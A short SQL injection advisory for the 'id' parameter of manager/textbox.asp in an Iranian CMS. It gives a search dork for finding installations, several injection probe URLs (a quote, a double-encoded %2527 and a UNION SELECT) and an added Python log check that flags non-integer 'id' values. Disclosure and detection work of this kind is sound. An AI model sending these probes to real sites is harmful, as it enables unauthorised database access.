Zigurrat CMS SQL Injection Vulnerability

2010-03-21
ID: 11391
CVE: None
Download vulnerable application: None
================= IUT-CERT =================
 Title: 
 Vendor: www.farsi-cms.com
 Dork: Design by Tagfa Co
Type: Input.Validation.Vulnerability (SQL Injection)
 Fix: N/A
 ================== nsec.ir =================
 Description:
 ------------------
 Zigurrat CMS is a CMS producer in Iran. The "manager/textbox.asp"
 pages in the Pars CMS product are vulnerable to SQL injection.
 Vulnerability Variant:
 ------------------
 Injection in the "id" parameter of "manager/textbox.asp".
 http://www.example.com/manager/textbox.asp?id='
 http://www.example.com/manager/textbox.asp?id=0'
 http://www.example.com/manager/textbox.asp?id=%2527
 http://www.example.com/manager/textbox.asp?id='
 http://www.example.com/manager/textbox.asp?id=<number> UNION SELECT *FROM VALIDTBLNAME'
 Solution:
 ------------------
 Input validation of Parameter "id" should be corrected.
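
 Added example, not part of the original advisory: a Python check for web-server request lines that flags "manager/textbox.asp" requests whose "id" is not a plain integer, including the double-encoded %2527 variant listed above. It assumes "id" is a numeric key of at most ten digits; the sample requests are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

TARGET_PATH = "/manager/textbox.asp"    # page named in the advisory
VALID_ID = re.compile(r"[0-9]{1,10}")   # assumption: "id" is a plain integer key


def raw_param(query, name):
    """Return the still-encoded value of `name`, or None if it is absent."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key).lower() == name:
            return value
    return None


def fully_decode(value, max_rounds=5):
    """URL-decode repeatedly so %2527 -> %27 -> ' is seen in its final form."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_id(url):
    """True when a textbox.asp request carries a non-integer "id" value."""
    parts = urlsplit(url)
    if parts.path.lower() != TARGET_PATH:   # IIS paths are case-insensitive
        return False
    value = raw_param(parts.query, "id")
    if value is None:
        return False
    return VALID_ID.fullmatch(fully_decode(value)) is None


# Constructed sample requests (not real log data), modelled on the variants above.
SAMPLE_REQUESTS = [
    "/manager/textbox.asp?id=12",
    "/manager/textbox.asp?id=0'",
    "/manager/textbox.asp?id=%2527",
    "/manager/textbox.asp?id=3%20UNION%20SELECT%20*FROM%20VALIDTBLNAME'",
    "/manager/default.asp?id='",
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print("ALERT" if suspicious_id(request) else "ok   ", request)
```

 The same integer-only rule is what the page itself should enforce on "id" before the value reaches the database query.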